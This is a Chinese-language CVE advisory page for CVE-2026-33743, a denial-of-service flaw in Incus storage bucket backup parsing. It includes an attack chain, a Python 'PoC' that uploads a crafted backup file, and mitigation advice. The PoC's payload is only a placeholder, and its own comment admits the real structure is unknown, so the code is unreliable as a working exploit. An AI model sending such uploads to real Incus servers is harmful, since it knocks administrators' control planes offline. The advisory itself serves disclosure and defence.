CVE-2026-33743 CVSS 6.5 中危

CVE-2026-33743 Incus存储桶备份拒绝服务漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33743

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Incus

漏洞概述

Incus系统容器和虚拟机管理器在6.23.0之前的版本中存在安全漏洞。拥有存储桶访问权限的攻击者可以利用特制的存储桶备份文件触发Incus守护进程崩溃。虽然该漏洞不影响正在运行的容器和虚拟机工作负载，但攻击者可利用此漏洞导致控制平面API持续不可用，从而造成拒绝服务。

技术细节

该漏洞的根源在于Incus对存储桶备份文件的解析逻辑存在缺陷。在受影响版本中，当系统处理导入的备份文件时，未能充分验证数据结构的完整性或边界条件。攻击者只需拥有较低的权限（PR:L），即可通过网络上传构造恶意的备份文件。当Incus守护进程尝试解析该文件时，会触发未处理的异常（如内存访问违例或断言失败），导致进程终止。由于攻击者可以重复执行此操作，管理员无法通过简单的重启服务来永久恢复控制平面功能，从而导致持续的拒绝服务状态。

攻击链分析

STEP 1

1. 获取访问权限

攻击者获取Incus系统的低权限用户账户，并拥有对存储桶功能的访问权限。

STEP 2

2. 构造恶意文件

攻击者分析Incus备份解析逻辑，构造一个特制的存储桶备份文件，该文件包含导致解析器崩溃的特定数据模式。

STEP 3

3. 上传恶意备份

攻击者通过API接口将恶意备份文件上传至Incus服务器的存储桶中。

STEP 4

4. 触发解析崩溃

Incus守护进程尝试处理该恶意备份文件，触发内部错误导致进程意外终止。

STEP 5

5. 持续拒绝服务

控制平面API因守护进程崩溃而不可用。攻击者可重复此过程，维持系统管理接口的瘫痪状态。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target Incus server API endpoint for storage bucket backups
target_url = "https://<incus-host>:8443/1.0/storage-buckets/<bucket-id>/backups"

# Headers (Authentication required)
headers = {
    "Authorization": "Bearer <your-api-token>"
}

# Simulating a malicious backup file that triggers the parsing crash
# Specific payload structure depends on the vulnerability root cause
malicious_backup_data = b"\x00\x01\x02\x03...Malicious_Pattern..."

files = {
    'file': ('malicious_backup.tar.gz', malicious_backup_data, 'application/gzip')
}

try:
    # Send the malicious backup to the server
    response = requests.post(target_url, headers=headers, files=files, verify=False)
    
    if response.status_code == 200 or response.status_code == 202:
        print("PoC uploaded successfully. Daemon might crash shortly.")
    else:
        print(f"Upload failed with status: {response.status_code}")
        
except requests.exceptions.ConnectionError:
    print("Connection dropped abruptly. The Incus daemon likely crashed (DoS successful).")
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

Incus < 6.23.0

防御指南

临时缓解措施

建议立即限制普通用户对存储桶备份功能的操作权限，并密切监控Incus守护进程的运行状态。在无法立即升级的情况下，可配置守护进程监控脚本，在崩溃时自动重启服务以尽量减少服务中断时间，但这只能缓解而无法解决根本漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表